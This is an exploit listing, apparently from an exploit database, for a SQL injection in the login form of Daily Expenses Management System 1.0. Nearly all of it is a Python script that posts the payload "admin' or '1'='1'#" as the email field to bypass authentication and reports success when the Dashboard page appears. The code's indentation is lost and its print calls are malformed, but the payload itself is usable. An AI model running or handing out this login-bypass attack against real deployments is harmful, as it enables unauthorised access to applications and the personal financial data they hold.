Exploit for Daily Expenses Management System 1.0 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:158739
# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection  
# Exploit Author: Daniel Ortiz  
# Date: 2020-08-01  
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html  
# Tested on: XAMPP Version 5.6.40 / Windows 10  
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html  
  
import sys  
import requests  
import urllib3  
import re  
import time  
  
  
urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)  
  
def make_request(url, payload):  
  
p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"}  
s = requests.Session()  
r = s.post(url, data=payload, proxies=p)  
return r  
  
if __name__ == '__main__':  
  
if len(sys.argv) != 2:  
print("[*] Daily Expenses Management System | username SQL injection")  
print("[*] usage: %s TARGET" % sys.argv[0])  
print("[*] e.g: %s 192.168.0.10" % sys.argv[0])   
sys.exit(-1)  
  
TARGET = sys.argv[1]  
LOGIN_FORM = "http://%s/dets/" % TARGET  
  
  
# Step 1 - Bypass login form  
  
url = LOGIN_FORM  
p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'}   
r = make_request(url, p1)  
print("[+] Endpoint: %s") % LOGIN_FORM  
print("[+] Making requests with payload: %s") % p1  
  
if re.findall('Dashboard', r.text):  
print("[+] Target vulnerable")  
else:  
print("[-] Error !!!")